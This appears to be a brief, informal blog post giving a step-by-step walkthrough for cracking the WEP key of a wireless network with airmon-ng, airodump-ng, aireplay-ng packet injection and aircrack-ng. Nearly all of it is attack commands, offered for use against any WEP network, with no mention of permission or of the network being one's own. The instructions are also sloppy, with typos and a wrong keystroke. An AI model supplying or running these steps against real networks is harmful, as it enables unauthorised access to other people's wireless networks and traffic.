wired equivalent privacy hack

Simply typing in iwconfig will allow you to see all the wireless extensions configured on the machine. If you see a screen full of data next to a WLAN0 or ETH0, you’re ready to continue to the next step; otherwise, you will see a list of “no wireless extensions” messages.(my extension wlan0)

airmon-ng start wlan0 -start mode monitor (monde monitor enabled mon0)

airodump-ng mon0 -networks scanning

choose one with wep key and note:
-network channel
-network bssid then type: airodump-ng -w wep -c network channel --bssid AA:AA:AA:AA:AA:AA mon0
-aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA mon0
-aireplay-ng -3 -b AA:AA:AA:AA:AA:AA mon0
waiting until you reach 50000 date and then try to crack
stop the injection by typing ctrl+alt+c and then type dir(it shown the file where your datas are saved)
copy your file-is is the file with the extension ¨ .cap¨ then type
aircrack-ng wep.cap THIS IS ALL -YOU CRACK A WEP KEY!
 
[URL=http://s06.flagcounter.com/more/6xL][IMG]http://s06.flagcounter.com/count/6xL/bg=FFFFFF/txt=000000/border=CCCCCC/columns=3/maxflags=20/viewers=0/labels=0/[/IMG][/URL] Locations of visitors to this page